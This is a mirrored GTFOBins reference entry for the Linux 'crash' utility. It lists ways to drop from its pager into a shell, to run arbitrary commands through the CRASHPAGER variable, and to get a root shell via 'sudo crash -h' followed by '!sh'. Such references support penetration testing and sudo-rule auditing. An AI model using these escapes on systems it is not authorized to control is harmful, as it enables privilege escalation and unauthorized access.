1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00
GTFOBins.github.io/_gtfobins/crash.md

18 lines
475 B
Markdown
Raw Permalink Normal View History

2020-03-15 13:10:31 +01:00
---
functions:
shell:
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
code: |
crash -h
!sh
command:
- code: |
COMMAND='/usr/bin/id'
CRASHPAGER="$COMMAND" crash -h
sudo:
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
code: |
sudo crash -h
!sh
---